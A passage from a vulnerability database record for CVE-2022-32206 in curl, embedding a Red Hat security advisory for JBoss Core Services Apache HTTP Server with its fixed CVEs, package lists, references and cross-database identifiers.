\n\nRHEL-8-CNV-4.11\n\nvirt-cdi-operator-container-v4.11.1-5\nvirt-cdi-uploadserver-container-v4.11.1-5\nvirt-cdi-apiserver-container-v4.11.1-5\nvirt-cdi-importer-container-v4.11.1-5\nvirt-cdi-controller-container-v4.11.1-5\nvirt-cdi-cloner-container-v4.11.1-5\nvirt-cdi-uploadproxy-container-v4.11.1-5\ncheckup-framework-container-v4.11.1-3\nkubevirt-tekton-tasks-wait-for-vmi-status-container-v4.11.1-7\nkubevirt-tekton-tasks-create-datavolume-container-v4.11.1-7\nkubevirt-template-validator-container-v4.11.1-4\nvirt-handler-container-v4.11.1-5\nhostpath-provisioner-operator-container-v4.11.1-4\nvirt-api-container-v4.11.1-5\nvm-network-latency-checkup-container-v4.11.1-3\ncluster-network-addons-operator-container-v4.11.1-5\nvirtio-win-container-v4.11.1-4\nvirt-launcher-container-v4.11.1-5\novs-cni-marker-container-v4.11.1-5\nhyperconverged-cluster-webhook-container-v4.11.1-7\nvirt-controller-container-v4.11.1-5\nvirt-artifacts-server-container-v4.11.1-5\nkubevirt-tekton-tasks-modify-vm-template-container-v4.11.1-7\nkubevirt-tekton-tasks-disk-virt-customize-container-v4.11.1-7\nlibguestfs-tools-container-v4.11.1-5\nhostpath-provisioner-container-v4.11.1-4\nkubevirt-tekton-tasks-disk-virt-sysprep-container-v4.11.1-7\nkubevirt-tekton-tasks-copy-template-container-v4.11.1-7\ncnv-containernetworking-plugins-container-v4.11.1-5\nbridge-marker-container-v4.11.1-5\nvirt-operator-container-v4.11.1-5\nhostpath-csi-driver-container-v4.11.1-4\nkubevirt-tekton-tasks-create-vm-from-template-container-v4.11.1-7\nkubemacpool-container-v4.11.1-5\nhyperconverged-cluster-operator-container-v4.11.1-7\nkubevirt-ssp-operator-container-v4.11.1-4\novs-cni-plugin-container-v4.11.1-5\nkubevirt-tekton-tasks-cleanup-vm-container-v4.11.1-7\nkubevirt-tekton-tasks-operator-container-v4.11.1-2\ncnv-must-gather-container-v4.11.1-8\nkubevirt-console-plugin-container-v4.11.1-9\nhco-bundle-registry-container-v4.11.1-49\n\n3. 
-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: Red Hat JBoss Core Services Apache HTTP Server 2.4.51 SP1 security update\nAdvisory ID: RHSA-2022:8840-01\nProduct: Red Hat JBoss Core Services\nAdvisory URL: https://access.redhat.com/errata/RHSA-2022:8840\nIssue date: 2022-12-08\nCVE Names: CVE-2022-1292 CVE-2022-2068 CVE-2022-22721\n CVE-2022-23943 CVE-2022-26377 CVE-2022-28330\n CVE-2022-28614 CVE-2022-28615 CVE-2022-30522\n CVE-2022-31813 CVE-2022-32206 CVE-2022-32207\n CVE-2022-32208 CVE-2022-32221 CVE-2022-35252\n CVE-2022-42915 CVE-2022-42916\n====================================================================\n1. Summary:\n\nAn update is now available for Red Hat JBoss Core Services. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat JBoss Core Services on RHEL 7 Server - noarch, x86_64\nRed Hat JBoss Core Services on RHEL 8 - noarch, x86_64\n\n3. Description:\n\nRed Hat JBoss Core Services is a set of supplementary software for Red Hat\nJBoss middleware products. This software, such as Apache HTTP Server, is\ncommon to multiple JBoss middleware products, and is packaged under Red Hat\nJBoss Core Services to allow for faster distribution of updates, and for a\nmore consistent update experience. \n\nThis release of Red Hat JBoss Core Services Apache HTTP Server 2.4.51\nService Pack 1 serves as a replacement for Red Hat JBoss Core Services\nApache HTTP Server 2.4.51, and includes bug fixes and enhancements, which\nare documented in the Release Notes document linked to in the References. 
\n\nSecurity Fix(es):\n\n* curl: HSTS bypass via IDN (CVE-2022-42916)\n\n* curl: HTTP proxy double-free (CVE-2022-42915)\n\n* curl: POST following PUT confusion (CVE-2022-32221)\n\n* httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism\n(CVE-2022-31813)\n\n* httpd: mod_sed: DoS vulnerability (CVE-2022-30522)\n\n* httpd: out-of-bounds read in ap_strcmp_match() (CVE-2022-28615)\n\n* httpd: out-of-bounds read via ap_rwrite() (CVE-2022-28614)\n\n* httpd: mod_proxy_ajp: Possible request smuggling (CVE-2022-26377)\n\n* curl: control code in cookie denial of service (CVE-2022-35252)\n\n* jbcs-httpd24-httpd: httpd: mod_isapi: out-of-bounds read (CVE-2022-28330)\n\n* curl: Unpreserved file permissions (CVE-2022-32207)\n\n* curl: various flaws (CVE-2022-32206 CVE-2022-32208)\n\n* openssl: the c_rehash script allows command injection (CVE-2022-2068)\n\n* openssl: c_rehash script allows command injection (CVE-2022-1292)\n\n* jbcs-httpd24-httpd: httpd: core: Possible buffer overflow with very large\nor unlimited LimitXMLRequestBody (CVE-2022-22721)\n\n* jbcs-httpd24-httpd: httpd: mod_sed: Read/write beyond bounds\n(CVE-2022-23943)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nApplications using the APR libraries, such as httpd, must be restarted for\nthis update to take effect. After installing the updated packages, the\nhttpd daemon will be restarted automatically. \n\n5. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n2064319 - CVE-2022-23943 httpd: mod_sed: Read/write beyond bounds\n2064320 - CVE-2022-22721 httpd: core: Possible buffer overflow with very large or unlimited LimitXMLRequestBody\n2081494 - CVE-2022-1292 openssl: c_rehash script allows command injection\n2094997 - CVE-2022-26377 httpd: mod_proxy_ajp: Possible request smuggling\n2095000 - CVE-2022-28330 httpd: mod_isapi: out-of-bounds read\n2095002 - CVE-2022-28614 httpd: Out-of-bounds read via ap_rwrite()\n2095006 - CVE-2022-28615 httpd: Out-of-bounds read in ap_strcmp_match()\n2095015 - CVE-2022-30522 httpd: mod_sed: DoS vulnerability\n2095020 - CVE-2022-31813 httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism\n2097310 - CVE-2022-2068 openssl: the c_rehash script allows command injection\n2099300 - CVE-2022-32206 curl: HTTP compression denial of service\n2099305 - CVE-2022-32207 curl: Unpreserved file permissions\n2099306 - CVE-2022-32208 curl: FTP-KRB bad message verification\n2120718 - CVE-2022-35252 curl: control code in cookie denial of service\n2135411 - CVE-2022-32221 curl: POST following PUT confusion\n2135413 - CVE-2022-42915 curl: HTTP proxy double-free\n2135416 - CVE-2022-42916 curl: HSTS bypass via IDN\n\n6. 
Package List:\n\nRed Hat JBoss Core Services on RHEL 7 Server:\n\nSource:\njbcs-httpd24-apr-util-1.6.1-99.el7jbcs.src.rpm\njbcs-httpd24-curl-7.86.0-2.el7jbcs.src.rpm\njbcs-httpd24-httpd-2.4.51-37.el7jbcs.src.rpm\njbcs-httpd24-mod_http2-1.15.19-20.el7jbcs.src.rpm\njbcs-httpd24-mod_jk-1.2.48-44.redhat_1.el7jbcs.src.rpm\njbcs-httpd24-mod_md-2.4.0-18.el7jbcs.src.rpm\njbcs-httpd24-mod_proxy_cluster-1.3.17-13.el7jbcs.src.rpm\njbcs-httpd24-mod_security-2.9.3-22.el7jbcs.src.rpm\njbcs-httpd24-nghttp2-1.43.0-11.el7jbcs.src.rpm\njbcs-httpd24-openssl-1.1.1k-13.el7jbcs.src.rpm\njbcs-httpd24-openssl-chil-1.0.0-17.el7jbcs.src.rpm\njbcs-httpd24-openssl-pkcs11-0.4.10-32.el7jbcs.src.rpm\n\nnoarch:\njbcs-httpd24-httpd-manual-2.4.51-37.el7jbcs.noarch.rpm\n\nx86_64:\njbcs-httpd24-apr-util-1.6.1-99.el7jbcs.x86_64.rpm\njbcs-httpd24-apr-util-debuginfo-1.6.1-99.el7jbcs.x86_64.rpm\njbcs-httpd24-apr-util-devel-1.6.1-99.el7jbcs.x86_64.rpm\njbcs-httpd24-apr-util-ldap-1.6.1-99.el7jbcs.x86_64.rpm\njbcs-httpd24-apr-util-mysql-1.6.1-99.el7jbcs.x86_64.rpm\njbcs-httpd24-apr-util-nss-1.6.1-99.el7jbcs.x86_64.rpm\njbcs-httpd24-apr-util-odbc-1.6.1-99.el7jbcs.x86_64.rpm\njbcs-httpd24-apr-util-openssl-1.6.1-99.el7jbcs.x86_64.rpm\njbcs-httpd24-apr-util-pgsql-1.6.1-99.el7jbcs.x86_64.rpm\njbcs-httpd24-apr-util-sqlite-1.6.1-99.el7jbcs.x86_64.rpm\njbcs-httpd24-curl-7.86.0-2.el7jbcs.x86_64.rpm\njbcs-httpd24-curl-debuginfo-7.86.0-2.el7jbcs.x86_64.rpm\njbcs-httpd24-httpd-2.4.51-37.el7jbcs.x86_64.rpm\njbcs-httpd24-httpd-debuginfo-2.4.51-37.el7jbcs.x86_64.rpm\njbcs-httpd24-httpd-devel-2.4.51-37.el7jbcs.x86_64.rpm\njbcs-httpd24-httpd-selinux-2.4.51-37.el7jbcs.x86_64.rpm\njbcs-httpd24-httpd-tools-2.4.51-37.el7jbcs.x86_64.rpm\njbcs-httpd24-libcurl-7.86.0-2.el7jbcs.x86_64.rpm\njbcs-httpd24-libcurl-devel-7.86.0-2.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_http2-1.15.19-20.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_http2-debuginfo-1.15.19-20.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_jk-ap24-1.2.48-44.redhat_1.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_jk-debuginfo-1.2.48-44.redhat_1.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_ldap-2.4.51-37.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_md-2.4.0-18.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_md-debuginfo-2.4.0-18.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_proxy_cluster-1.3.17-13.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_proxy_cluster-debuginfo-1.3.17-13.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_proxy_html-2.4.51-37.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_security-2.9.3-22.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_security-debuginfo-2.9.3-22.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_session-2.4.51-37.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_ssl-2.4.51-37.el7jbcs.x86_64.rpm\njbcs-httpd24-nghttp2-1.43.0-11.el7jbcs.x86_64.rpm\njbcs-httpd24-nghttp2-debuginfo-1.43.0-11.el7jbcs.x86_64.rpm\njbcs-httpd24-nghttp2-devel-1.43.0-11.el7jbcs.x86_64.rpm\njbcs-httpd24-openssl-1.1.1k-13.el7jbcs.x86_64.rpm\njbcs-httpd24-openssl-chil-1.0.0-17.el7jbcs.x86_64.rpm\njbcs-httpd24-openssl-chil-debuginfo-1.0.0-17.el7jbcs.x86_64.rpm\njbcs-httpd24-openssl-debuginfo-1.1.1k-13.el7jbcs.x86_64.rpm\njbcs-httpd24-openssl-devel-1.1.1k-13.el7jbcs.x86_64.rpm\njbcs-httpd24-openssl-libs-1.1.1k-13.el7jbcs.x86_64.rpm\njbcs-httpd24-openssl-perl-1.1.1k-13.el7jbcs.x86_64.rpm\njbcs-httpd24-openssl-pkcs11-0.4.10-32.el7jbcs.x86_64.rpm\njbcs-httpd24-openssl-pkcs11-debuginfo-0.4.10-32.el7jbcs.x86_64.rpm\njbcs-httpd24-openssl-static-1.1.1k-13.el7jbcs.x86_64.rpm\n\nRed Hat JBoss Core Services on RHEL 8:\n\nSource:\njbcs-httpd24-apr-util-1.6.1-99.el8jbcs.src.rpm\njbcs-httpd24-curl-7.86.0-2.el8jbcs.src.rpm\njbcs-httpd24-httpd-2.4.51-37.el8jbcs.src.rpm\njbcs-httpd24-mod_http2-1.15.19-20.el8jbcs.src.rpm\njbcs-httpd24-mod_jk-1.2.48-44.redhat_1.el8jbcs.src.rpm\njbcs-httpd24-mod_md-2.4.0-18.el8jbcs.src.rpm\njbcs-httpd24-mod_proxy_cluster-1.3.17-13.el8jbcs.src.rpm\njbcs-httpd24-mod_security-2.9.3-22.el8jbcs.src.rpm\njbcs-httpd24-nghttp2-1.43.0-11.el8jbcs.src.rpm\njbcs-httpd24-openssl-1.1.1k-13.el8jbcs.src.rpm\njbcs-httpd24-openssl-chil-1.0.0-17.el8jbcs.src.rpm\njbcs-httpd24-openssl-pkcs11-0.4.10-32.el8jbcs.src.rpm\n\nnoarch:\njbcs-httpd24-httpd-manual-2.4.51-37.el8jbcs.noarch.rpm\n\nx86_64:\njbcs-httpd24-apr-util-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-devel-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-ldap-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-ldap-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-mysql-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-mysql-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-nss-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-nss-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-odbc-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-odbc-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-openssl-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-openssl-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-pgsql-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-pgsql-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-sqlite-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-sqlite-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-curl-7.86.0-2.el8jbcs.x86_64.rpm\njbcs-httpd24-curl-debuginfo-7.86.0-2.el8jbcs.x86_64.rpm\njbcs-httpd24-httpd-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-httpd-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-httpd-devel-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-httpd-selinux-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-httpd-tools-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-httpd-tools-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-libcurl-7.86.0-2.el8jbcs.x86_64.rpm\njbcs-httpd24-libcurl-debuginfo-7.86.0-2.el8jbcs.x86_64.rpm\njbcs-httpd24-libcurl-devel-7.86.0-2.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_http2-1.15.19-20.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_http2-debuginfo-1.15.19-20.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_jk-ap24-1.2.48-44.redhat_1.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_jk-ap24-debuginfo-1.2.48-44.redhat_1.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_ldap-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_ldap-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_md-2.4.0-18.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_md-debuginfo-2.4.0-18.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_proxy_cluster-1.3.17-13.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_proxy_cluster-debuginfo-1.3.17-13.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_proxy_html-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_proxy_html-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_security-2.9.3-22.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_security-debuginfo-2.9.3-22.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_session-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_session-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_ssl-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_ssl-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-nghttp2-1.43.0-11.el8jbcs.x86_64.rpm\njbcs-httpd24-nghttp2-debuginfo-1.43.0-11.el8jbcs.x86_64.rpm\njbcs-httpd24-nghttp2-devel-1.43.0-11.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-1.1.1k-13.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-chil-1.0.0-17.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-chil-debuginfo-1.0.0-17.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-debuginfo-1.1.1k-13.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-devel-1.1.1k-13.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-libs-1.1.1k-13.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-libs-debuginfo-1.1.1k-13.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-perl-1.1.1k-13.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-pkcs11-0.4.10-32.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-pkcs11-debuginfo-0.4.10-32.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-static-1.1.1k-13.el8jbcs.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2022-1292\nhttps://access.redhat.com/security/cve/CVE-2022-2068\nhttps://access.redhat.com/security/cve/CVE-2022-22721\nhttps://access.redhat.com/security/cve/CVE-2022-23943\nhttps://access.redhat.com/security/cve/CVE-2022-26377\nhttps://access.redhat.com/security/cve/CVE-2022-28330\nhttps://access.redhat.com/security/cve/CVE-2022-28614\nhttps://access.redhat.com/security/cve/CVE-2022-28615\nhttps://access.redhat.com/security/cve/CVE-2022-30522\nhttps://access.redhat.com/security/cve/CVE-2022-31813\nhttps://access.redhat.com/security/cve/CVE-2022-32206\nhttps://access.redhat.com/security/cve/CVE-2022-32207\nhttps://access.redhat.com/security/cve/CVE-2022-32208\nhttps://access.redhat.com/security/cve/CVE-2022-32221\nhttps://access.redhat.com/security/cve/CVE-2022-35252\nhttps://access.redhat.com/security/cve/CVE-2022-42915\nhttps://access.redhat.com/security/cve/CVE-2022-42916\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. 
\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBY5ISE9zjgjWX9erEAQixuA//dX5Q3wtu2MRvrjD/sK/r6dqBz4fWWhS9\nws2A8cRa5ki3RlCaYQ3pP7LkRtIdankAP3HG1NU4er/odsMEW5aEgku+5foV7w4M\nWEd0USLKs3Pw5a7/3TjOBUf5CA7oet03C7/u9idWaLD/ip4UMhskSnz33qFQSFZf\nFAWNdsRhH8+ql6qFMg9Odv5RFX3i2+wBy5pC69Akr2FBEt9j+/PbvSPWuPD26n6H\n0l+QUKrI3OW1EHzz+S/8aEfTFKLluXfhVJn61wdA8Kjs4ZKrnBz8czJjxn4hOi7a\nz0tpzg5d1BJEf/UB7EdyyLBGRIliWhf978qtG8QS37GEgnQSof2xgcfu1NGiHl9j\nypCqX1R4oOkeoISynnZUKWZ1uFp5GkMiRtPu0Bw7WYB6z/8OWZce4yIqh1rcG09d\nNcyleabDtpJ7C3BJQzpnhXAWjri7oJ6wHBvcbQ9sLj2xkQRX2Zpi0KJGIH8iLwdn\nIk+RIZ7u/mXeW3ulcwiQTPYbTQLWGXqgZV1qxJq91HIcu+y3STQwZjb4fZuqjH5M\nonO/rF2y50l9LqArg/v9KAJUbHSKMDP6r7Dx02J+iKjW3g7NczoImrU7JcyAgce9\nmCN7gMmU9bQx1tagIKcKKW5IVN/jHyWKJW/t0teoaECsa2LMgoEIt+6RcmQXWpdF\n6t6oQh+b3NY=UGfz\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Description:\n\nThe curl packages provide the libcurl library and the curl utility for\ndownloading files from servers using various protocols, including HTTP,\nFTP, and LDAP. Bugs fixed (https://bugzilla.redhat.com/):\n\n2099300 - CVE-2022-32206 curl: HTTP compression denial of service\n2167815 - CVE-2023-23916 curl: HTTP multi-header compression denial of service\n\n6",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-32206"
},
{
"db": "VULMON",
"id": "CVE-2022-32206"
},
{
"db": "PACKETSTORM",
"id": "168538"
},
{
"db": "PACKETSTORM",
"id": "168275"
},
{
"db": "PACKETSTORM",
"id": "170741"
},
{
"db": "PACKETSTORM",
"id": "168347"
},
{
"db": "PACKETSTORM",
"id": "170083"
},
{
"db": "PACKETSTORM",
"id": "170166"
},
{
"db": "PACKETSTORM",
"id": "172765"
},
{
"db": "PACKETSTORM",
"id": "168284"
}
],
"trust": 1.71
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2022-32206",
"trust": 2.5
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2023/02/15/3",
"trust": 1.6
},
{
"db": "HACKERONE",
"id": "1570651",
"trust": 1.6
},
{
"db": "SIEMENS",
"id": "SSA-333517",
"trust": 1.6
},
{
"db": "PACKETSTORM",
"id": "168347",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "170166",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "168284",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2022.3366",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.6333",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.3732",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.6290",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4468",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4757",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.3143",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.3238",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4324",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.5247",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4266",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4112",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3117",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.5632",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.2163",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.5300",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4525",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4568",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "167607",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "168301",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "168174",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "168503",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "168378",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "169443",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022071152",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022062927",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202206-2565",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2022-32206",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168538",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168275",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170741",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170083",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "172765",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-32206"
},
{
"db": "PACKETSTORM",
"id": "168538"
},
{
"db": "PACKETSTORM",
"id": "168275"
},
{
"db": "PACKETSTORM",
"id": "170741"
},
{
"db": "PACKETSTORM",
"id": "168347"
},
{
"db": "PACKETSTORM",
"id": "170083"
},
{
"db": "PACKETSTORM",
"id": "170166"
},
{
"db": "PACKETSTORM",
"id": "172765"
},
{
"db": "PACKETSTORM",
"id": "168284"
},
{
"db": "CNNVD",
"id": "CNNVD-202206-2565"
},
{
"db": "NVD",
"id": "CVE-2022-32206"
}
]
},
"id": "VAR-202206-1900",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.5566514
},
"last_update_date": "2026-04-10T23:28:19.708000Z",
"patch": {
"_id": null,
"data": [
{
"title": "curl Remediation of resource management error vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=198520"
},
{
"title": "Ubuntu Security Notice: USN-5495-1: curl vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-5495-1"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-32206"
},
{
"db": "CNNVD",
"id": "CNNVD-202206-2565"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-770",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-32206"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.6,
"url": "https://hackerone.com/reports/1570651"
},
{
"trust": 1.6,
"url": "http://seclists.org/fulldisclosure/2022/oct/41"
},
{
"trust": 1.6,
"url": "http://www.openwall.com/lists/oss-security/2023/02/15/3"
},
{
"trust": 1.6,
"url": "https://www.debian.org/security/2022/dsa-5197"
},
{
"trust": 1.6,
"url": "https://security.netapp.com/advisory/ntap-20220915-0003/"
},
{
"trust": 1.6,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf"
},
{
"trust": 1.6,
"url": "https://lists.debian.org/debian-lts-announce/2022/08/msg00017.html"
},
{
"trust": 1.6,
"url": "http://seclists.org/fulldisclosure/2022/oct/28"
},
{
"trust": 1.6,
"url": "https://support.apple.com/kb/ht213488"
},
{
"trust": 1.6,
"url": "https://security.gentoo.org/glsa/202212-01"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/bev6br4mti3cewk2yu2hqzuw5fas3fey/"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2022-32206"
},
{
"trust": 0.8,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.8,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2022-32208"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1292"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2022-1292"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2022-2068"
},
{
"trust": 0.6,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/bev6br4mti3cewk2yu2hqzuw5fas3fey/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.3143"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/curl-denial-of-service-via-http-compression-38671"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022062927"
},
{
"trust": 0.6,
"url": "https://support.apple.com/en-us/ht213488"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168347/red-hat-security-advisory-2022-6422-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.6290"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168301/red-hat-security-advisory-2022-6287-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168174/red-hat-security-advisory-2022-6157-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4112"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.5300"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/170166/red-hat-security-advisory-2022-8840-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168378/red-hat-security-advisory-2022-6507-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.5247"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.6333"
